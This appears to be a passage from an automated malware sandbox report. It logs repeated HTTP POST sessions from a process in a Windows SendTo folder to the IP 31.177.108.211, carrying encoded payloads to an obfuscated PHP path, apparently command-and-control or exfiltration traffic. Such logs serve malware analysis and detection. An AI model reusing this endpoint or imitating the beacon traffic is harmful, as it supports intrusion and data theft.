                                          Sep 13, 2024 21:02:54.714803934 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:55.066536903 CEST2532OUTData Raw: 5e 55 43 53 50 44 5c 55 59 5f 51 51 52 58 54 5a 5a 5f 5a 50 55 54 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCSPD\UY_QQRXTZZ_ZPUTS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?:Z#%^ )[>]:+<>>(4Q(,-$07$:@2&;9[&!^-'
                                          Sep 13, 2024 21:02:55.494278908 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:55.655364037 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:55 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.45669331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:55.839740038 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:56.191507101 CEST2532OUTData Raw: 5b 5f 46 53 55 41 5c 57 59 5f 51 51 52 5d 54 5b 5a 52 5a 5a 55 56 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_FSUA\WY_QQR]T[ZRZZUVSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@<<*#T> %)+*(-_*80T(/*Z3'%:D$?;%9[&!^-3
                                          Sep 13, 2024 21:02:56.575354099 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:56.734886885 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:02:56.958065033 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.45669431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:56.984200001 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:57.332153082 CEST2532OUTData Raw: 5e 54 46 51 50 46 5c 57 59 5f 51 51 52 5f 54 52 5a 5d 5a 5c 55 51 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TFQPF\WY_QQR_TRZ]Z\UQSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9("41> 3:>]-?%_)(V<<*3(%*$&? 1;9[&!^-;
                                          Sep 13, 2024 21:02:57.770236015 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:57.844551086 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          27192.168.2.45669531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:58.003643990 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:58.347904921 CEST2532OUTData Raw: 5e 55 43 50 50 47 5c 57 59 5f 51 51 52 5e 54 50 5a 5e 5a 51 55 56 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCPPG\WY_QQR^TPZ^ZQUVS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?/1 2=X#Z*+:T+* (!3+28%(&9[&!^-
                                          Sep 13, 2024 21:02:58.535315037 CEST1236OUTData Raw: 3f 05 3b 00 2b 57 0f 41 35 3e 01 1f 02 3b 56 3e 38 04 0c 3a 0b 3d 0a 12 39 3c 1e 08 31 3f 3d 27 3f 0a 2e 0c 22 5a 3f 55 31 2c 06 5c 08 5b 14 3b 38 09 0a 04 27 00 5f 53 37 3e 03 2b 23 21 2c 3e 27 36 3a 23 03 1c 5e 1f 33 33 39 21 20 20 56 27 3b 06
                                          Data Ascii: ?;+WA5>;V>8:=9<1?='?."Z?U1,\[;8'_S7>+#!,>'6:#^339! V';")9 9V219=Y9!9?$*>]9=&[] #7YYU6V? W91,%Y;;88)2->> >V38._>"?Z-!T!<W 1:90 =333>+5#=+.%<3:Y*_=8&D>9 788[2Y6>4;E
                                          Sep 13, 2024 21:02:58.925816059 CEST1236OUTData Raw: 5e 55 43 50 50 47 5c 57 59 5f 51 51 52 5e 54 50 5a 5e 5a 51 55 56 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCPPG\WY_QQR^TPZ^ZQUVS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?/1 2=X#Z*+:T+* (!3+28%(&9[&!^-
                                          Sep 13, 2024 21:02:59.310674906 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:59.311574936 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:59.312273026 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:59.312897921 CEST1296OUTData Raw: 04 3f 17 1a 3d 0b 06 51 3e 39 20 05 24 3c 01 0b 3f 2d 45 5b 31 06 21 3b 09 3c 52 19 37 02 2c 3d 3c 06 2a 3f 3f 07 24 3a 0a 5b 0b 02 32 21 36 30 30 1e 1a 13 3d 04 06 36 05 05 35 3b 3f 05 3b 00 2b 57 0f 41 35 3e 01 1f 02 3b 56 3e 38 04 0c 3a 0b 3d
                                          Data Ascii: ?=Q>9 $<?-E[1!;<R7,=<*??$:[2!600=65;?;+WA5>;V>8:=9<1?='?."Z?U1,\[;8'_S7>+#!,>'6:#^339! V';")9 9V219=Y9!9?$*>]9=&[] #7YYU6V? W91,%Y;;88)2->> >V38._>"?Z-!T!<W
                                          Sep 13, 2024 21:02:59.694792986 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          28192.168.2.45669631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:59.821613073 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          29192.168.2.45669731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:02:59.917995930 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:00.269742966 CEST2108OUTData Raw: 5b 52 43 51 55 43 59 57 59 5f 51 51 52 58 54 5b 5a 58 5a 5c 55 5f 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCQUCYWY_QQRXT[ZXZ\U_SCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<Y*\ !]7:=;1+>)((V?<6]34W%:<2'+9[&!^-'
                                          Sep 13, 2024 21:03:00.670336008 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:00.804676056 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:00 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0d 29 35 38 09 27 15 3b 54 2f 04 2e 14 24 2c 30 5b 2b 0d 22 18 2b 03 33 03 2d 5c 2a 5a 30 5d 31 59 24 05 23 59 24 3c 3f 1a 29 2a 2e 46 0d 1d 25 15 29 3c 28 1d 3e 00 0d 05 33 2d 22 01 20 0e 20 07 25 2f 0d 1f 34 2f 3a 5c 23 0c 28 0f 32 04 0b 58 2c 35 0b 02 29 21 3e 58 20 1c 2e 55 0f 15 3a 08 31 22 39 09 3f 0c 33 58 3e 06 3a 12 31 06 2b 13 26 5d 20 53 27 3b 32 55 32 3c 22 01 27 22 2c 05 3c 13 29 56 22 31 2e 52 22 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:)58';T/.$,0[+"+3-\*Z0]1Y$#Y$<?)*.F%)<(>3-" %/4/:\#(2X,5)!>X .U:1"9?3X>:1+&] S';2U2<"'",<)V"1.R"'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.45669831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:00.039376020 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:00.394701004 CEST2532OUTData Raw: 5e 56 46 54 55 40 5c 55 59 5f 51 51 52 50 54 52 5a 5a 5a 59 55 57 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFTU@\UY_QQRPTRZZZYUWSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*,.]#!)\4)+&T<Y%*; +<:',%9#2?3%;9[&!^-
                                          Sep 13, 2024 21:03:00.806051970 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:00.961168051 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:00 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.45669931.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:01.096824884 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:01.441534996 CEST2532OUTData Raw: 5b 57 43 53 55 41 59 54 59 5f 51 51 52 5a 54 55 5a 59 5a 59 55 51 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WCSUAYTY_QQRZTUZYZYUQSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*?&[42_"0&(+"<<*)<?*]% 0V$*@%719[&!^-/
                                          Sep 13, 2024 21:03:01.866187096 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:02.000488997 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          32192.168.2.45670031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:02.225126982 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:02.582161903 CEST2532OUTData Raw: 5e 54 43 5e 55 46 59 57 59 5f 51 51 52 5b 54 55 5a 5a 5a 5b 55 54 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TC^UFYWY_QQR[TUZZZ[UTSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B<2Y ""739>86=<&>(U+030U&*27&9[&!^-+
                                          Sep 13, 2024 21:03:02.966633081 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:03.100908041 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          33192.168.2.45670231.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:03.238744974 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:03.597879887 CEST2532OUTData Raw: 5b 55 46 56 55 43 59 5d 59 5f 51 51 52 51 54 51 5a 5f 5a 5c 55 52 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UFVUCY]Y_QQRQTQZ_Z\URSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9D+?:#*#![>-+Y*T+,"' Q$*?D&(Z29[&!^-
                                          Sep 13, 2024 21:03:04.034991026 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:04.193108082 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          34192.168.2.45670331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:04.807431936 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:05.160397053 CEST2532OUTData Raw: 5e 53 43 5f 50 41 59 53 59 5f 51 51 52 5d 54 51 5a 5f 5a 50 55 52 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^SC_PAYSY_QQR]TQZ_ZPURSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+/9#2)4U5>5(9[=;),&X'34P&:2%9[&!^-3
                                          Sep 13, 2024 21:03:05.556852102 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:05.685635090 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:05 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          35192.168.2.45670431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:05.822371006 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
